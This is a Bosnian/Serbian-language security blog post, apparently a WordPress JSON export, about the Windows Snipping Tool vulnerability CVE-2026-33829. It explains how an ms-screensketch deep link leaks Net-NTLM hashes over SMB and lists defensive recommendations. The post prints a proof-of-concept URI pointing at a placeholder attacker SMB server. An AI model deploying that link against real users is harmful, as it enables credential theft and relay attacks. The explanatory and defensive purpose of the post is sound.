{"id":9140,"date":"2026-04-22T14:37:33","date_gmt":"2026-04-22T12:37:33","guid":{"rendered":"https:\/\/sajberinfo.com\/?p=9140"},"modified":"2026-04-22T14:37:33","modified_gmt":"2026-04-22T12:37:33","slug":"windows-snipping-tool-ranjivost","status":"publish","type":"post","link":"http:\/\/sajberinfo.com\/en\/2026\/04\/22\/windows-snipping-tool-ranjivost\/","title":{"rendered":"Windows Snipping Tool ranjivost"},"content":{"rendered":"<p>Nedavna ranjivost alatke <em>Windows<\/em> <em>Snipping<\/em> <em>Tool<\/em> otkrila je zabrinjavaju\u0107i trend: zlonamjerni akteri mogu iskoristiti propust kako bi prisilili prijavne <em>SMB<\/em> veze sa udaljenim serverima, \u010dime se ugro\u017eavaju korisni\u010dki podaci za prijavu. Istra\u017eivanje <em>BlackArrowSec<\/em> <em>Red<\/em> <em>Team<\/em> sigurnosnog istra\u017eiva\u010da <em>Margaruga<\/em> <a href=\"https:\/\/github.com\/blackarrowsec\/redteam-research\/tree\/master\/CVE-2026-33829\" target=\"_blank\" rel=\"noopener\">pokazuje<\/a> da ovakvi napadi predstavljaju ozbiljnu prijetnju, a sama ranjivost dodatno nagla\u0161ava stalne rizike povezane sa obra\u0111iva\u010dima internet adresa na <em>Windows<\/em> sistemima i ukazuje na nu\u017enost ja\u010dih bezbjednosnih mjera koje bi sprije\u010dile zloupotrebu i za\u0161titile korisnike.<\/p>\n<div id=\"attachment_9141\" style=\"width: 1034px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" aria-describedby=\"caption-attachment-9141\" class=\"size-full wp-image-9141\" src=\"https:\/\/sajberinfo.com\/wp-content\/uploads\/2026\/04\/Snipping-Tool.jpg\" alt=\"Snipping Tool\" width=\"1024\" height=\"1024\" srcset=\"https:\/\/sajberinfo.com\/wp-content\/uploads\/2026\/04\/Snipping-Tool.jpg 1024w, https:\/\/sajberinfo.com\/wp-content\/uploads\/2026\/04\/Snipping-Tool-300x300.jpg 300w, https:\/\/sajberinfo.com\/wp-content\/uploads\/2026\/04\/Snipping-Tool-150x150.jpg 150w, https:\/\/sajberinfo.com\/wp-content\/uploads\/2026\/04\/Snipping-Tool-768x768.jpg 768w, https:\/\/sajberinfo.com\/wp-content\/uploads\/2026\/04\/Snipping-Tool-12x12.jpg 12w, https:\/\/sajberinfo.com\/wp-content\/uploads\/2026\/04\/Snipping-Tool-80x80.jpg 80w, https:\/\/sajberinfo.com\/wp-content\/uploads\/2026\/04\/Snipping-Tool-320x320.jpg 320w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><p id=\"caption-attachment-9141\" class=\"wp-caption-text\"><em>Windows Snipping Tool ranjivost; Source: Bing Image Creator<\/em><\/p><\/div>\n<div id=\"ez-toc-container\" class=\"ez-toc-v2_0_82_2 counter-hierarchy ez-toc-counter ez-toc-custom ez-toc-container-direction\">\n<div class=\"ez-toc-title-container\">\n<p class=\"ez-toc-title\" style=\"cursor:inherit\">Sadr\u017eaj<\/p>\n<span class=\"ez-toc-title-toggle\"><a href=\"#\" class=\"ez-toc-pull-right ez-toc-btn ez-toc-btn-xs ez-toc-btn-default ez-toc-toggle\" aria-label=\"Toggle Table of Content\"><span class=\"ez-toc-js-icon-con\"><span class=\"\"><span class=\"eztoc-hide\" style=\"display:none;\">Toggle<\/span><span class=\"ez-toc-icon-toggle-span\"><svg style=\"fill: #ffffff;color:#ffffff\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" class=\"list-377408\" width=\"20px\" height=\"20px\" viewbox=\"0 0 24 24\" fill=\"none\"><path d=\"M6 6H4v2h2V6zm14 0H8v2h12V6zM4 11h2v2H4v-2zm16 0H8v2h12v-2zM4 16h2v2H4v-2zm16 0H8v2h12v-2z\" fill=\"currentColor\"><\/path><\/svg><svg style=\"fill: #ffffff;color:#ffffff\" class=\"arrow-unsorted-368013\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"10px\" height=\"10px\" viewbox=\"0 0 24 24\" version=\"1.2\" baseprofile=\"tiny\"><path d=\"M18.2 9.3l-6.2-6.3-6.2 6.3c-.2.2-.3.4-.3.7s.1.5.3.7c.2.2.4.3.7.3h11c.3 0 .5-.1.7-.3.2-.2.3-.5.3-.7s-.1-.5-.3-.7zM5.8 14.7l6.2 6.3 6.2-6.3c.2-.2.3-.5.3-.7s-.1-.5-.3-.7c-.2-.2-.4-.3-.7-.3h-11c-.3 0-.5.1-.7.3-.2.2-.3.5-.3.7s.1.5.3.7z\"\/><\/svg><\/span><\/span><\/span><\/a><\/span><\/div>\n<nav><ul class='ez-toc-list ez-toc-list-level-1' ><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-1\" href=\"http:\/\/sajberinfo.com\/en\/2026\/04\/22\/windows-snipping-tool-ranjivost\/#SNIPPING_TOOL_RANJIVOST\">SNIPPING TOOL RANJIVOST<\/a><ul class='ez-toc-list-level-3' ><li class='ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-2\" href=\"http:\/\/sajberinfo.com\/en\/2026\/04\/22\/windows-snipping-tool-ranjivost\/#Mehanizam_napada\">Mehanizam napada<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-3\" href=\"http:\/\/sajberinfo.com\/en\/2026\/04\/22\/windows-snipping-tool-ranjivost\/#Dokaz_koncepta_PoC\">Dokaz koncepta (PoC)<\/a><\/li><\/ul><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-4\" href=\"http:\/\/sajberinfo.com\/en\/2026\/04\/22\/windows-snipping-tool-ranjivost\/#UTICAJ\">UTICAJ<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-5\" href=\"http:\/\/sajberinfo.com\/en\/2026\/04\/22\/windows-snipping-tool-ranjivost\/#ZAKLJUCAK\">ZAKLJU\u010cAK<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-6\" href=\"http:\/\/sajberinfo.com\/en\/2026\/04\/22\/windows-snipping-tool-ranjivost\/#PREPORUKE\">PREPORUKE<\/a><\/li><\/ul><\/nav><\/div>\n\n<h2><span class=\"ez-toc-section\" id=\"SNIPPING_TOOL_RANJIVOST\"><\/span><strong><em>SNIPPING<\/em> <em>TOOL<\/em> RANJIVOST<\/strong><span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p><em>Snipping Tool<\/em> ranjivost u <em>Microsoft<\/em> alatu, ozna\u010dena kao <a href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2026-33829\" target=\"_blank\" rel=\"noopener\"><em>CVE-2026-33829<\/em><\/a>, predstavlja ozbiljan problem jer izla\u017ee korisnike potencijalnoj kra\u0111i he\u0161a <em>Net-NTLM<\/em> podataka za prijavu. <a href=\"https:\/\/sajberinfo.com\/en\/2022\/02\/27\/hakeri-eticki-hakeri-epizoda-2\/\" target=\"_blank\" rel=\"nofollow noopener\">Sigurnosni istra\u017eiva\u010d<\/a> koji je otkrio ovaj propust naglasio je da se on krije u na\u010dinu na koji <em>Windows<\/em> <em>Snipping<\/em> <em>Tool<\/em> obra\u0111uje registracije jedinstvenih identifikatora resursa (eng. <em>uniform resource identifier \u2013 URI<\/em>) dubokih veza koriste\u0107i \u0161emu protokola <em>ms-screensketch<\/em>.<\/p>\n<p>Opasnost ove ranjivosti le\u017ei u tome \u0161to je <a href=\"https:\/\/sajberinfo.com\/en\/2022\/03\/19\/hakeri-crni-sesiri-epizoda-3\/\" target=\"_blank\" rel=\"nofollow noopener\">zlonamjerni akteri<\/a> mogu iskoristiti kako bi prisilili <em>Server Message Block \u2013 SMB<\/em> vezu sa udaljenim serverom. Time se otvara mogu\u0107nost kra\u0111e osjetljivih korisni\u010dkih podataka za prijavu, ugro\u017eavanja bezbjednosti i pokretanja daljih zlonamjernih aktivnosti. Klju\u010dno je razumjeti da pogo\u0111ene verzije alata registruju duboke linkove putem pomenute \u0161eme protokola, \u0161to zlonamjernim akterima daje prostor da manipuli\u0161u ovim registracijama.<\/p>\n<p>\u0160ema jedinstvenog identifikatora resursa (<em>URI<\/em>) <em>ms-screensketch<\/em> ima va\u017enu ulogu jer omogu\u0107ava korisnicima pristup odre\u0111enim funkcijama unutar <em>Snipping Tool<\/em> aplikacije. Registrovanjem dubokih linkova, programeri i administratori obezbje\u0111uju pre\u010dice ili direktne putanje ka funkcijama bez potrebe da se prolazi kroz glavno okru\u017eenje alata. Me\u0111utim, nepravilno rukovanje ovim registracijama, kao \u0161to pokazuje ranjivost, mo\u017ee dovesti do ozbiljnih posljedica.<\/p>\n<p>Sam proces iskori\u0161tavanja po\u010dinje kada zlonamjerni akteri kreiraju zlonamjernu internet vezu koriste\u0107i parametar <em>ms-screensketch: edit<\/em>. Ova pa\u017eljivo kreirana internet adresa (eng. <em>uniform resource locator \u2013 URL<\/em>) usmjerava parametar <em>filePath<\/em> ka eksternom <em>SMB<\/em> serveru kojim upravlja zlonamjerni akter. Korisnici se zatim obmanjuju da kliknu na vezu, naj\u010de\u0161\u0107e putem <a href=\"https:\/\/sajberinfo.com\/en\/2022\/01\/02\/phishing-meta-su-ljudi-ne-tehnologija\/\" target=\"_blank\" rel=\"nofollow noopener\"><em>phishing<\/em> <\/a>elektronskih poruka ili ugro\u017eenih internet lokacija.<\/p>\n<p>Klikom na vezu, <em>Snipping Tool<\/em> se povezuje sa udaljenim serverom kako bi preuzeo la\u017enu datoteku, pri \u010demu u pozadini tiho otkriva he\u0161 <a href=\"https:\/\/sajberinfo.com\/en\/2019\/02\/24\/lozinka-password-sifra\/\" target=\"_blank\" rel=\"nofollow noopener\">lozinke <\/a><em>NTLMv2<\/em> korisnika. Ovakav prikriveni pristup omogu\u0107ava zlonamjernim akterima da ostanu neotkriveni dok ostvaruju cilj kra\u0111e osjetljivih podataka. Iako iskori\u0161tavanje zahtijeva u\u010de\u0161\u0107e korisnika, to ne umanjuje njegovu ozbiljnost; naprotiv, nagla\u0161ava zna\u010daj edukacije korisnika o prijetnjama i potrebu za bezbjednim navikama pri kori\u0161tenju internet pregleda\u010da.<\/p>\n<p>&nbsp;<\/p>\n<h3><span class=\"ez-toc-section\" id=\"Mehanizam_napada\"><\/span><strong>Mehanizam napada<\/strong><span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>Proces iskori\u0161tavanja ranjivosti <em>CVE\u20112026\u201133829<\/em> zapo\u010dinje izradom posebne internet veze u kojoj se koristi parametar <em>ms\u2011screensketch:edit<\/em>. Zlonamjerni akteri usmjeravaju vrijednost <em>filePath<\/em> ka udaljenom <em>SMB<\/em> serveru pod njihovom kontrolom. Kada korisnik klikne na takav link, <em>Snipping<\/em> <em>Tool<\/em> uspostavlja vezu sa tim serverom i u pozadini \u0161alje <em>NTLMv2<\/em> lozinke u obliku he\u0161 vrijednosti.<\/p>\n<p>Naj\u010de\u0161\u0107i na\u010din da \u017ertva bude navedena na klik jeste putem la\u017enih poruka elektronske po\u0161te ili ugro\u017eenih internet stranica. Veze su oblikovane tako da izgledaju bezopasno, ali zapravo vode ka udaljenim serverima zlonamjernih aktera. Na taj na\u010din se uspostavlja veza izme\u0111u korisni\u010dkog sistema i servera zlonamjernog aktera, \u0161to omogu\u0107ava prenos osjetljivih podataka.<\/p>\n<p>Ova vrsta napada oslanja se na kombinaciju tehni\u010dkog znanja i dru\u0161tvenog in\u017eenjeringa. Zlonamjerni akteri moraju precizno oblikovati internet adresu (<em>URL<\/em>) i istovremeno obezbijediti da njihov <em>SMB<\/em> server pravilno prihvata dolazne zahtjeve. Pored toga, mogu koristiti metode poput la\u017enog <em>DNS<\/em> odgovora ili manipulacije ke\u0161 memorijom kako bi \u017ertva bila usmjerena na pogre\u0161nu vezu.<\/p>\n<p>Ranljivost <em>Snipping Tool<\/em> alata proizlazi iz na\u010dina na koji je alat razvijen. Radi lak\u0161eg kori\u0161tenja, omogu\u0107eno je registrovanje dubokih linkova putem jedinstvenog identifikatora resursa (<em>URI<\/em>) bez provjere unosa. Upravo ta ranjivost otvara prostor da zlonamjerni akteri iskoriste parametre i usmjere korisnike ka serverima pod svojom kontrolom. Nedostatak provjere unosa \u010dini da se veza uspostavlja bez upozorenja.<\/p>\n<p>Iako je za uspjeh napada potrebna interakcija korisnika, sama metoda pokazuje da i uz takav uslov zlonamjerni akteri mogu do\u0107i do osjetljivih podataka. Klik na zlonamjernu vezu dovoljan je da se uspostavi veza i prenese lozinka u he\u0161 obliku, \u0161to zlonamjernim akterima daje osnovu za dalja djelovanja.<\/p>\n<p>&nbsp;<\/p>\n<h3><span class=\"ez-toc-section\" id=\"Dokaz_koncepta_PoC\"><\/span><strong>Dokaz koncepta (<em>PoC<\/em>)<\/strong><span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>Dokaz koncepta (eng. <em>proof\u2011of\u2011concept \u2013 PoC<\/em>) koji je objavio istra\u017eiva\u010dki tim <em>Black Arrow Security<\/em> pokazuje kako zlonamjerni akter mo\u017ee tiho da ukrade he\u0161eve <em>Net\u2011NTLM<\/em> podataka za prijavu korisnika tako \u0161to ih namami da posjete zlonamjernu internet stranicu.<\/p>\n<p>Sam proces iskori\u0161tavanja zahtijeva vrlo malo tehni\u010dkog znanja od strane zlonamjernog aktera. Skladi\u0161tenjem zlonamjerne internet adrese (<em>URL<\/em>) ili <em>HTML<\/em> stranice koja automatski aktivira duboku vezu, oni se mogu ubjedljivo predstaviti kao legitimni entiteti u ciljanom okru\u017eenju. Dokaz koncepta istra\u017eiva\u010dkog tima <em>Black Arrow Security<\/em> demonstrira napad pomo\u0107u jednog jedinstvenog identifikatora resursa (<em>URI<\/em>) koji pokre\u0107e internet pregleda\u010d:<\/p>\n<p><span style=\"font-family: terminal, monaco, monospace;\"><em>textms-screensketch:edit?&amp;filePath=\\\\&lt;attacker-smb-server&gt;\\file.png&amp;isTemporary=false&amp;saved=true&amp;source=Toast<\/em><\/span><\/p>\n<p>Kada \u017ertva otvori ovu vezu, <em>Snipping Tool <\/em>se pokre\u0107e i tiho poku\u0161ava da u\u010dita udaljeni resurs preko <em>SMB<\/em> protokola. Tokom tog poku\u0161aja povezivanja, <em>Windows<\/em> automatski prenosi korisnikov odgovor za <em>Net\u2011NTLM <\/em>provjeru identiteta na server zlonamjernog aktera, otkrivaju\u0107i podatke za prijavu koji se zatim mogu krekovati van mre\u017ee ili koristiti u <em>NTLM<\/em> relejnim napadima na interne mre\u017ene resurse.<\/p>\n<p>Ovaj proces je posebno zna\u010dajan zbog svoje transparentnosti u ime obje uklju\u010dene strane \u2013 \u017ertve i zlonamjernog aktera. Alatka za isijecanje se otvara kako se o\u010dekuje, dok se <em>NTLM<\/em> provjera identiteta odvija u pozadini, \u0161to ote\u017eava otkrivanje iskori\u0161tavanja bez eksplicitnog saznanja o njegovom postojanju.<\/p>\n<p>&nbsp;<\/p>\n<h2><span class=\"ez-toc-section\" id=\"UTICAJ\"><\/span><strong>UTICAJ<\/strong><span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>Uticaj ranjivosti u <em>Windows Snipping Tool<\/em> alatu ogleda se prije svega u otvaranju prostora za kra\u0111u podataka za prijavu. Sama \u010dinjenica da se kroz jednostavan klik na zlonamjernu vezu mo\u017ee pokrenuti proces prenosa <em>NTLM<\/em> he\u0161a pokazuje koliko je korisni\u010dki sistem izlo\u017een. Time se stvara direktna veza izme\u0111u korisnika i udaljenog servera pod kontrolom zlonamjernog aktera, \u0161to dovodi do ugro\u017eavanja povjerljivih informacija i pove\u0107ava rizik od daljih zloupotreba.<\/p>\n<p>Ova ranjivost ima \u0161iri uticaj na bezbjednosni ekosistem <em>Windows<\/em> okru\u017eenja. Registracija dubokih linkova putem jedinstvenog identifikatora resursa (<em>URI<\/em>) \u0161eme <em>ms\u2011screensketch<\/em>, iako zami\u0161ljena kao olak\u0161ica za korisnike, pokazuje se kao propust koji omogu\u0107ava manipulaciju. Posljedica je naru\u0161avanje povjerenja u osnovne funkcije sistema, jer alat koji je zami\u0161ljen da bude jednostavan i koristan postaje potencijalni kanal za napad.<\/p>\n<p>Uticaj se osje\u0107a i na nivou korisni\u010dkog pona\u0161anja. Napadi koji zavise od interakcije korisnika, poput klika na zlonamjernu internet adresu (<em>URL<\/em>), ukazuju na va\u017enost edukacije i svijesti o prijetnjama. Ranjivost <em>Snipping Tool<\/em> alata time ne poga\u0111a samo tehni\u010dki aspekt sistema, ve\u0107 i navike korisnika, jer pokazuje kako dru\u0161tveni in\u017eenjering u kombinaciji sa tehni\u010dkim propustima mo\u017ee dovesti do ozbiljnih posljedica.<\/p>\n<p>Na organizacionom nivou, ranjivost otvara pitanje povjerenja u standardne alate koji dolaze uz operativni sistem. Kada osnovne aplikacije postanu izvor rizika, to uti\u010de na percepciju pouzdanosti cijelog sistema. Posljedice se mogu odraziti na poslovne mre\u017ee, gdje kra\u0111a podataka za prijavu mo\u017ee dovesti do \u0161irenja napada unutar infrastrukture i ugro\u017eavanja osjetljivih resursa.<\/p>\n<p>Uticaj se \u0161iri i na \u0161iru bezbjednosnu zajednicu, jer ovakvi propusti ukazuju na stalnu potrebu za pa\u017eljivim nadzorom i testiranjem alata koji se koriste svakodnevno. Demonstracija napada kroz dokaz koncepta pokazuje kako i jednostavne funkcije mogu biti iskori\u0161tene za slo\u017eene prijetnje, \u010dime se nagla\u0161ava da bezbjednost mora biti osnovni prioritet u razvoju i odr\u017eavanju sistema.<\/p>\n<p>&nbsp;<\/p>\n<h2><span class=\"ez-toc-section\" id=\"ZAKLJUCAK\"><\/span><strong>ZAKLJU\u010cAK<\/strong><span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>Ranjivost u <em>Snipping Tool<\/em> alatu pokazuje kako i naizgled jednostavne funkcije mogu postati ulazna ta\u010dka za napade. Sama priroda propusta otkriva da se bezbjednosni problemi ne javljaju samo u slo\u017eenim sistemima, ve\u0107 i u alatima koji se svakodnevno koriste, \u0161to dodatno nagla\u0161ava osjetljivost digitalnog okru\u017eenja.<\/p>\n<p>Demonstracija kroz dokaz koncepta jasno prikazuje da zlonamjerni akter mo\u017ee iskoristiti propust bez potrebe za naprednim znanjem. Time se otvara pitanje koliko su osnovni mehanizmi za\u0161tite u operativnim sistemima spremni da odgovore na ovakve prijetnje. Sama transparentnost procesa, gdje se alat pokre\u0107e normalno dok se u pozadini odvija prenos podataka, \u010dini napad posebno podmuklim.<\/p>\n<p>Ovakvi primjeri ukazuju na to da granica izme\u0111u legitimne funkcionalnosti i zloupotrebe mo\u017ee biti vrlo tanka. Kada se korisnik obmanjuje da klikne na vezu koja izgleda bezopasno, a u pozadini se odvija prenos osjetljivih informacija, jasno je da se bezbjednost ne mo\u017ee posmatrati samo kroz tehni\u010dke parametre, ve\u0107 i kroz na\u010din na koji se funkcije predstavljaju korisnicima.<\/p>\n<p>Objavljeni dokaz koncepta ima i \u0161iri zna\u010daj, jer pokazuje kako se propusti mogu dokumentovati i javno demonstrirati, \u010dime se stvara pritisak na proizvo\u0111a\u010de da reaguju. Istovremeno, takva demonstracija slu\u017ei kao podsjetnik da ranjivosti nisu uvijek vidljive na prvi pogled, ve\u0107 se otkrivaju tek kada se poka\u017ee kako funkcija mo\u017ee biti iskori\u0161tena u praksi.<\/p>\n<p>&nbsp;<\/p>\n<h2><span class=\"ez-toc-section\" id=\"PREPORUKE\"><\/span><strong>PREPORUKE<\/strong><span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>Pouzdane mjere za\u0161tite imaju klju\u010dnu ulogu u smanjenju rizika koji nastaje zbog ranjivosti u <em>Windows Snipping Tool <\/em>alatu, jer pravovremeno sprje\u010davaju zloupotrebu i \u0161tite podatke korisnika. U nastavku slijede preporuke koje mogu pomo\u0107i u ja\u010danju sigurnosti i smanjenju izlo\u017eenosti riziku:<\/p>\n<ol>\n<li>Organizacije i korisnici moraju primjenjivati zvani\u010dne bezbjednosne ispravke kompanije <em>Microsoft<\/em> objavljene 14. aprila 2026. godine kako bi za\u0161titili svoje sisteme od <em>CVE-2026-33829<\/em>. Ovaj korak treba preduzeti \u0161to je prije mogu\u0107e da bi se sprije\u010dili potencijalni poku\u0161aji zloupotrebe. Ispravka \u0107e otkloniti ranjivost u aplikaciji <em>Snipping Tool<\/em>.<\/li>\n<li>Radi dodatnog ja\u010danja mre\u017ene bezbjednosti, organizacijama se preporu\u010duje da blokiraju odlazni <em>SMB<\/em> saobra\u0107aj (port 445) na svom perimetru. Ova mjera sprje\u010dava <em>NTLM<\/em> he\u0161ove da komuniciraju sa spoljnim serverima, \u010dime se smanjuje rizik od neovla\u0161tenog pristupa. Primjena ovog pode\u0161avanja doda\u0107e dodatni sloj za\u0161tite protiv potencijalne zloupotrebe.<\/li>\n<li>Sprovesti edukaciju zaposlenih o opasnostima povezanim sa klikom na nepoznate veze i odobravanjem pokretanja aplikacija bez provjere od su\u0161tinskog je zna\u010daja za sprje\u010davanje potencijalnih napada. Organizacije treba da redovno sprovode obuke kako bi naglasile va\u017enost opreznog postupanja prilikom kori\u0161tenja internet pregleda\u010da ili nepoznatih aplikacija.<\/li>\n<li>Timovi za bezbjednost moraju pratiti mre\u017eni saobra\u0107aj radi neobi\u010dnih odlaznih <em>SMB<\/em> konekcija ka nepoznatim lokacijama, \u0161to mo\u017ee ukazivati na poku\u0161aje zloupotrebe. Primjena sna\u017enog sistema za pra\u0107enje omogu\u0107i\u0107e organizacijama da pravovremeno otkriju i odgovore na potencijalne bezbjednosne prijetnje.<\/li>\n<li>Korisnicima se preporu\u010duje da svoje sisteme odr\u017eavaju a\u017eurnim sa najnovijim <em>Microsoft<\/em> a\u017euriranjima. Redovno provjeravanje i instaliranje ispravki osigurava da se ranjivosti poput <em>Snipping Tool CVE-2026-33829<\/em> otklone na vrijeme, \u010dime se smanjuje rizik od zloupotrebe.<\/li>\n<li>Primjena politike liste dozvoljenih aplikacija mo\u017ee pomo\u0107i u sprje\u010davanju pokretanja zlonamjernih aplikacija na korisni\u010dkim sistemima. Ova mjera \u0107e smanjiti vjerovatno\u0107u potencijalnih bezbjednosnih proboja izazvanih iskori\u0161tavanjem ranjivosti poput <em>Snipping Tool CVE-2026-33829<\/em>.<\/li>\n<li>Uspostavljanje bezbjedne osnovne konfiguracije za <em>Windows<\/em> sisteme pomo\u0107i \u0107e u sprje\u010davanju iskori\u0161tavanja ranjivosti poput <em>Snipping Tool CVE-2026-33829<\/em>. Ovo podrazumijeva pode\u0161avanje sistemskih postavki i primjenu bezbjednosnih politika koje smanjuju potencijalne rizike povezane sa ranjivo\u0161\u0107u.<\/li>\n<li>Segmentacija mre\u017ee na izolovane dijelove mo\u017ee smanjiti <a href=\"https:\/\/sajberinfo.com\/en\/2023\/03\/24\/povrsina-napada-uvod-epizoda-1\/\" target=\"_blank\" rel=\"nofollow noopener\">povr\u0161inu napada<\/a> ograni\u010davanjem <a href=\"https:\/\/sajberinfo.com\/en\/2023\/11\/09\/lateral-movement\/\" target=\"_blank\" rel=\"nofollow noopener\">bo\u010dnog kretanja<\/a> u slu\u010daju napada. Primjena segmentacije mre\u017ee ote\u017ea\u0107e zlonamjernim akterima iskori\u0161tavanje ranjivosti poput <em>Snipping Tool CVE-2026-33829<\/em>.<\/li>\n<li>Razviti i primjenjivati <a href=\"https:\/\/sajberinfo.com\/en\/2020\/10\/26\/plan-odgovora-na-sajber-prijetnju\/\" target=\"_blank\" rel=\"nofollow noopener\">plan odgovora na sajber prijtnje<\/a> je od su\u0161tinskog zna\u010daja za pravovremeno i efikasno reagovanje na potencijalne napade izazvane iskori\u0161tavanjem ranjivosti <em>Windows<\/em> <em>Snipping<\/em> <em>Tool.<\/em> Ovo podrazumijeva uspostavljanje procedura za otkrivanje, obuzdavanje, uklanjanje i oporavak od incidenata.<\/li>\n<li>Sprovoditi redovne bezbjednosne procjene koje \u0107e pomo\u0107i u pravovremenom otkrivanju ranjivosti poput <em>Snipping Tool CVE-2026-33829<\/em>. Primjena ove mjere osigurava da se potencijalni rizici otklone prije nego \u0161to ih zlonamjerni akteri mogu iskoristiti.<\/li>\n<li>Uspostavljanje bezbjedne politike \u201c<em>Donese\u0161 svoj ure\u0111aj\u201d<\/em> (eng. <em>bring your own device \u2013 BYOD<\/em>) od su\u0161tinskog je zna\u010daja za organizacije koje dozvoljavaju zaposlenima da koriste li\u010dne ure\u0111aje na mre\u017ei. Ovo podrazumijeva primjenu bezbjednosnih politika i procedura koje smanjuju potencijalne rizike povezane sa ranjivostima poput <em>Snipping Tool CVE-2026-33829<\/em>.<\/li>\n<li>Redovno pregledanje sistemskih dnevnika pomo\u0107i \u0107e u otkrivanju neobi\u010dnih aktivnosti, koje mogu ukazivati na poku\u0161aje zloupotrebe izazvane iskori\u0161tavanjem ranjivosti <em>Windows Snipping Tool<\/em> Primjena ove mjere osigurava pravovremeno otkrivanje potencijalnih bezbjednosnih prijetnji.<\/li>\n<li>Razviti i primjenjivati efikasan plan <a href=\"https:\/\/sajberinfo.com\/en\/2020\/11\/02\/rezervna-kopija-i-cuvanje-podataka\/\" target=\"_blank\" rel=\"nofollow noopener\">rezervnih<\/a> kopija i oporavka od su\u0161tinskog je zna\u010daja za smanjivanje prekida rada i gubitka podataka usljed potencijalnih napada izazvanih iskori\u0161tavanjem ranjivosti poput <em>Snipping Tool<\/em> CVE-2026-33829.<\/li>\n<li>Uspostavljanje bezbjedne politike za rad na daljinu od su\u0161tinskog je zna\u010daja za organizacije koje dozvoljavaju zaposlenima da rade van kancelarije. Ovo podrazumijeva primjenu bezbjednosnih politika i procedura koje smanjuju potencijalne rizike povezane sa ranjivostima poput <em>Snipping Tool <\/em>CVE-2026-33829, uklju\u010duju\u0107i osiguravanje da svi ure\u0111aji koje koriste zaposleni budu a\u017eurni sa najnovijim ispravkama.<\/li>\n<li>Sprovoditi redovne vje\u017ebe testiranja penetracije pomo\u0107i \u0107e u otkrivanju ranjivosti poput <em>Snipping Tool CVE-2026-33829<\/em> koje su mo\u017eda propu\u0161tene tokom rutinskih testiranja ili procjena. Primjena ove mjere osigurava da se potencijalni rizici otklone prije nego \u0161to ih zlonamjerni akteri mogu iskoristiti.<\/li>\n<li>Uspostavljanje bezbjedne politike za oblak od su\u0161tinskog je zna\u010daja za organizacije koje koriste usluge oblaka za \u010duvanje osjetljivih podataka. Ovo podrazumijeva primjenu bezbjednosnih politika i procedura koje smanjuju potencijalne rizike povezane sa ranjivostima poput <em>Snipping Tool<\/em> <em>CVE-2026-33829<\/em>, uklju\u010duju\u0107i osiguravanje da svi kori\u0161teni ure\u0111aji budu a\u017eurni sa najnovijim ispravkama.<\/li>\n<li>Redovno pregledanje bezbjednosnih politika i procedura pomo\u0107i \u0107e da one ostanu efikasne u rje\u0161avanju novih prijetnji izazvanih iskori\u0161tavanjem ranjivosti poput <em>Snipping Tool<\/em> <em>CVE-2026-33829<\/em>. Primjena ove mjere osigurava da organizacije budu korak ispred potencijalnih rizika povezanih sa razvojem sajber prijetnji.<\/li>\n<\/ol>\n<p>Primjena ovih preporuka od su\u0161tinskog je zna\u010daja za za\u0161titu od ranjivosti <em>Windows Snipping Tool<\/em> alata. Pridr\u017eavanjem ovih smjernica i stalnim informisanjem o novim bezbjednosnim prijetnjama, organizacije i korisnici mogu zna\u010dajno smanjiti svoju izlo\u017eenost potencijalnim napadima.<\/p>","protected":false},"excerpt":{"rendered":"<p>Nedavna ranjivost alatke Windows Snipping Tool otkrila je zabrinjavaju\u0107i trend: zlonamjerni akteri mogu iskoristiti propust kako bi prisilili prijavne SMB veze sa udaljenim serverima, \u010dime se ugro\u017eavaju korisni\u010dki podaci za prijavu. Istra\u017eivanje BlackArrowSec Red&#46;&#46;&#46;<\/p>","protected":false},"author":1,"featured_media":9141,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[3712,4172,3410,1452,3389,4170,4171,4173,4175,4174,4168,4169,2977,3580],"class_list":["post-9140","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-hronike","tag-bezbjednost-sistema","tag-cve202633829","tag-cyber-security","tag-data-protection","tag-digitalna-bezbjednost","tag-ntlm-hes","tag-phishing-pretnja","tag-ranjivost-alatke","tag-security-risk","tag-sigurnost-korisnika","tag-snipping-tool-ranjivost","tag-windows-propust","tag-windows-vulnerability","tag-zlonamjerni-napadi"],"_links":{"self":[{"href":"http:\/\/sajberinfo.com\/en\/wp-json\/wp\/v2\/posts\/9140","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/sajberinfo.com\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/sajberinfo.com\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/sajberinfo.com\/en\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/sajberinfo.com\/en\/wp-json\/wp\/v2\/comments?post=9140"}],"version-history":[{"count":5,"href":"http:\/\/sajberinfo.com\/en\/wp-json\/wp\/v2\/posts\/9140\/revisions"}],"predecessor-version":[{"id":9146,"href":"http:\/\/sajberinfo.com\/en\/wp-json\/wp\/v2\/posts\/9140\/revisions\/9146"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/sajberinfo.com\/en\/wp-json\/wp\/v2\/media\/9141"}],"wp:attachment":[{"href":"http:\/\/sajberinfo.com\/en\/wp-json\/wp\/v2\/media?parent=9140"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/sajberinfo.com\/en\/wp-json\/wp\/v2\/categories?post=9140"},{"taxonomy":"post_tag","e